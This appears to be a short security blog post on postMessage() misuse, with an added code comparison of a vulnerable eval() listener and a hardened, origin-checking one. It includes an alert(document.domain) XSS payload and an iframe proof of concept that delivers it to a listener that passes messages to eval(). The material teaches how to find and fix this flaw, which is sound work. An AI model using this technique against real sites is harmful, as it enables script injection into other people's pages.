postMessage() security

Sumeet darekar
3 min read · Apr 30, 2024


postMessage() method

This method enables communication between two pages if and only if they originate from the same protocol and port number. It provides a secure mechanism for communication if it is set up properly.

Two methods are generally used in this communication:

  1. postMessage() : sends data
  2. addEventListener() : listens for data


  1. postMessage() :

  postMessage(message, targetOrigin)
  postMessage(message, targetOrigin, transfer)

message => the data/payload you want to send to the other window.

targetOrigin => the origin of the target window that should receive the message; if the target window's origin does not match, the message is not sent. Alternatively, "*" can be specified as targetOrigin, which means the target window can have any origin.

  2. addEventListener() :

  window.addEventListener("message", (event) => {
      // whatever content; the payload sent by the other window arrives in event.data
  }, false) // third argument is useCapture (true/false)

message => the event type to listen for; the event carries the data/payload sent from the other window.

function => defines what action is performed when the data/payload is received.

Where is the Bug

First, to exploit a postMessage bug the application must use web messaging. If it does, the listener (addEventListener) should be identified.

Tool to identify listeners:

postMessage extension created by Frans Rosén:

Chrome:

Firefox [forked from fransr]:

Vulnerabilities that can be found via postMessage include XSS, information disclosure, authentication misconfiguration and many more.

Example : Describing Bug

This application is vulnerable to postMessage() XSS, so let's exploit it.

First, identify whether there is any listener on the application using the above extension.

Yes, there is an addEventListener() method in the JavaScript; let's analyse it.

So the application takes our payload/data and puts it into an eval() function for further processing. As our payload/data ends up in eval(), let's run JavaScript there.

Open the console by pressing the 'Esc' key, then send the malicious postMessage() payload.

By using alert() we can pop up an alert, which shows that we can run JavaScript on the application.

payload = window.postMessage('alert(document.domain)','*')

Now, exploiting the vulnerability by using an iframe on

Code to exploit :

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<link href="style.css" rel="stylesheet" type="text/css" />
</head>
<body>
<script>
function exploit(){
  // send the payload to the framed target; its listener passes event.data to eval()
  payload = "alert(document.domain)"
  document.getElementById("target").contentWindow.postMessage(payload, "*")
}
</script>
Hello world
<iframe src="" id="target" onload="exploit()"></iframe>
<script src="script.js"></script>
</body>
</html>
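The listener pattern the post describes (event.data handed straight to eval(), no check on who sent it) is what makes the PoC above work. The following is an added example, not code from the original post, showing that vulnerable listener beside a hardened one that checks event.origin against an allowlist, accepts only structured messages, and sends with an explicit targetOrigin instead of "*". The origin https://app.example and the setTheme message shape are hypothetical values chosen for the example; the handlers take a plain { origin, data } object (the fields a MessageEvent provides) so the file also runs under Node.

```javascript
// Added example: vulnerable postMessage listener beside a hardened one.
// Not from the original post; origins and message types below are assumptions.

// Vulnerable pattern from the post: no origin check, data goes straight to eval().
// Any window holding a reference to this one (a framing parent, an opener)
// can run JavaScript here, whatever its origin.
function vulnerableHandler(event) {
  return eval(event.data); // do not use: arbitrary code execution
}

// Hardened listener. Assumed (hypothetical) contract: the only legitimate
// sender is https://app.example, and messages are objects such as
// { type: "setTheme", value: "dark" }.
const TRUSTED_ORIGINS = new Set(["https://app.example"]);
const ALLOWED_THEMES = new Set(["light", "dark"]);

function hardenedHandler(event) {
  // 1. Drop anything not sent by a trusted origin. Sandboxed iframes and
  //    data: URLs report the string "null", which is never in the allowlist.
  if (!TRUSTED_ORIGINS.has(event.origin)) {
    return { ok: false, reason: "untrusted origin" };
  }
  // 2. Require a structured message; never treat data as code or HTML.
  const msg = event.data;
  if (typeof msg !== "object" || msg === null || typeof msg.type !== "string") {
    return { ok: false, reason: "malformed message" };
  }
  // 3. Dispatch on a closed set of message types with validated arguments.
  switch (msg.type) {
    case "setTheme":
      if (!ALLOWED_THEMES.has(msg.value)) {
        return { ok: false, reason: "invalid theme" };
      }
      return { ok: true, theme: msg.value };
    default:
      return { ok: false, reason: "unknown message type" };
  }
}

// Browser registration, guarded so the same file runs under Node.
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    const result = hardenedHandler(event);
    if (!result.ok) console.warn("dropped postMessage:", result.reason);
  }, false);
}

// Sender side: name the target origin explicitly rather than "*", so the
// browser discards the message if the frame has navigated elsewhere.
function sendTheme(targetWindow, theme) {
  targetWindow.postMessage({ type: "setTheme", value: theme }, "https://app.example");
}
```

The origin check is the part the post's vulnerable listener lacks; the structured-message check is what removes eval() from the picture entirely, so even a trusted sender cannot be abused into running code.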



sayonara ^_^